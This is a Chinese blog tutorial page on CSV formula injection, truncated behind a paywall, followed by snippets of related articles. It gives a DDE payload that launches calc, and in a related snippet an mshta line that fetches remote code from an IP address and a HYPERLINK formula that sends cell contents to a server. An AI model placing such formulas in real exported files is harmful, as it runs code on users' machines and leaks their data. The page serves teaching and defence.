【漏洞挖掘】——46、 CSV注入实践操作

最新推荐文章于 2025-09-05 01:03:12 发布
最新推荐文章于 2025-09-05 01:03:12 发布
阅读量439 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【WEB渗透】 文章标签: 渗透测试 信息安全 网络安全 web渗透 CSV
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/139520410
本文详细介绍了CSV注入的概念,展示了如何通过开启特定功能进行漏洞复现,包括简易测试和反弹Shell的实现。同时,讨论了防御绕过策略,并提出了多种防御措施,如禁止导出特定格式,内容过滤及格式设定。
漏洞介绍

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行

漏洞复现
简易测试

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能:

之后构造以下恶意载荷:

=1+cmd|' /C calc'!A0

之后模拟用户打开Excel文件:

发现载荷成功

了解本专栏 订阅专栏 解锁全文
漏洞挖掘】——68、GoogleHacking信息泄露
Fly_鹏程万里
06-11 426
通过借助Google搜索语法捕获大量与目标网站相关的敏感信息(各种类型文件、特殊功能模块等),之后进行深入利用。搜素指定网站的相关文档(Excel、PDF、PPT)搜索开放远程桌面的WEB连接的服务器。搜索指定网站的Google快照。查询存在SQL注入漏洞的网站。搜素指定网站的管理员入口。收集Discuz论坛主机。搜索网站的公共FTP用户。
创新!AI应用架构师构建数据安全服务AI防护新思路
AI天才研究院
07-31 1019
在数字化转型加速的今天,数据已成为企业的核心资产。规则引擎僵化:依赖人工维护的规则库无法应对变种攻击(如SQL注入变种、钓鱼邮件新模板),误报率高达30%以上;未知威胁检测能力弱:传统签名匹配技术无法识别0-day攻击(未知漏洞利用),导致企业平均响应时间超过24小时;实时性不足:在大数据场景(如日均10TB日志、100万+并发请求)下,传统批处理模式无法实现秒级威胁检测与响应。这些问题让企业陷入“被动防御”的困境——总是在攻击发生后才修补漏洞,而无法提前预判和阻止威胁。
csv可以保存特殊字符_浅谈CSV注入漏洞
weixin_30916653的博客
12-28 896
背景某天在逛expdb时候看到了CSV Injection的exp,在渗透测试的过程中也偶尔会遇到类似的情况,这一漏洞很早之前就出现过,但是很多人没有意识到漏洞的危害性,于是抱着学习的心态进行了一波漏洞复现和学习。漏洞介绍CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开C...
CSV Injection (CSV 注入攻击)
cwxbox
01-28 1645
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
PayloadsAllTheThings CSV注入CSV文件注入攻击Payload
最新发布
gitblog_00581的博客
09-05 358
> 还在为CSV文件下载功能的安全隐患而头疼?一文掌握CSV注入攻击的完整Payload库和防护方案! ## ???? 读完本文你能得到 - ✅ CSV注入攻击的完整原理剖析 - ✅ 20+种实战Payload分类详解 - ✅ 动态数据交换(DDE)攻击深度解析 - ✅ Google Sheets特殊公式注入技巧 - ✅ 企业级防护方案和最佳实践 - ✅ 自动化检测工具推荐 ## ???? CSV注...
csv注入文件
HoAd'blog
08-06 926
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
CSV注入漏洞
SHUY96的博客
12-30 1970
一、背景 最近在开发中,遇到CSV注入漏洞,特此研究一下。我们知道“对于网络安全来说,一切的外部输入都是不可信的”,但在我们大脑的第一印象中会把csv文件当做是普通的文件,未对其保持足够的警惕,从而引起安全漏洞问题。 二、定义 攻击人员通过在CSV中构造恶意的命令或函数,当正常用户使用Excel打开这个CSV文件时,恶意的命令或函数被执行,从而导致攻击的行为。 三、产生原因 1、CSV文件中的几个特殊字符+、-、@、=都可用于在Microsoft Excel中触发公式解释 例如:在CSV单元格中输入“=1+
Web 安全之 CSV 注入攻击详解
路多辛的所思所想
02-25 2022
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV 文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV 文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV 文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
CSV注入
94小菜
11-25 4944
CSV注入 漏洞简介: CSV注入(CSV Injection)漏洞通常会出现在有导出文件(.csv/.xls)功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理: 在xls表格中,输入=1+1,回车后看到表格变成2,+号被当作运算执行了 不只是+号, = 、- 、@这三个符号也会被excel解析成共事 DDE(Dynamic Data Exchange)协议: DDE
网络安全——社会工程学02
m0_63715896的博客
12-29 2393
◆社会工程学:如果目标网络没有直接的入口,欺骗的艺术将起到抛砖引玉的重要作用。对目标组织中的人员进行定向攻击,很有可能帮助我们找到渗透目标系统的入口。例如:诱使用户运行会安装后门的恶意程序。社会工程学渗透分为多种不同形式,伪装成网络管理员,通过电话要求用户提供给自己的账户信息,发送钓鱼邮件来劫持用户的银行账户,甚至是诱使某人出现在某个地点。 ▶社会工程学是利用人性弱点体察、获取有价值信息的实践方法,它是一种欺骗的艺术。在缺 少目标系统的必要信息时,社会工程学技术是渗透测试人员获取信息的至关重要的手段。对 所
C#代码质量:五步炼成‘零BUG代码’——对比5大神器,代码CT机全解析!
java专栏
04-29 844
🔥关注墨瑾轩,带你探索编程的奥秘!🚀🔥超萌技术攻略,轻松晋级编程高手🚀🔥技术宝库已备好,就等你来挖掘🚀🔥订阅墨瑾轩,智趣学习不孤单🚀🔥即刻启航,编程之旅更有趣🚀。
安全测试 csv 注入
weixin_46202430的博客
03-09 500
csv 注入 用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0 =HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这.
CSV注入漏洞原理及利用教程
alert['Hello World']
10-24 1万+
参考链接 https://blog.youkuaiyun.com/qq_34304003/article/details/87635582 https://www.freebuf.com/vuls/195656.html
安全测试-CSV注入漏洞
热门推荐
iSelenium
11-01 1万+
  CSV Injection Vulnerability 2016-05-17 Author: Evi1m0 (知道创宇404安全实验室) Date: 2016-05-17 0x01 概述 现在很多应用提供了导出电子表格的功能(不限于 Web 应用),早在 2014 年 8月 29 日国外 James Kettle 便发表了《Comma Separated Vulnerabiliti...
[译]CSV 注入:被人低估的巨大风险
weixin_34198453的博客
10-22 425
原文地址:The Absurdly Underestimated Dangers of CSV Injection 原文作者:georgemauer 译文出自:掘金翻译计划 本文永久链接:github.com/xitu/gold-m… 译者:mnikn 校对者:yct21,CACppuccino 本文讲的是CSV 注入:被人低估的巨大...
Web安全-浅析CSV注入漏洞的原理及利用
道阻且长,行则将至
05-01 4778
文章目录漏洞简介漏洞原理漏洞利用命令执行钓鱼攻击反弹shell漏洞实例Twitter网站Hackerone漏洞挖掘漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏洞通常会出现在有导出文件 (.csv/.xls) 功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL 会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理 人们通常认为 CSV 或 xls 文件中包含的文本不会有任何安全风险,这是比较大的一个误区。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值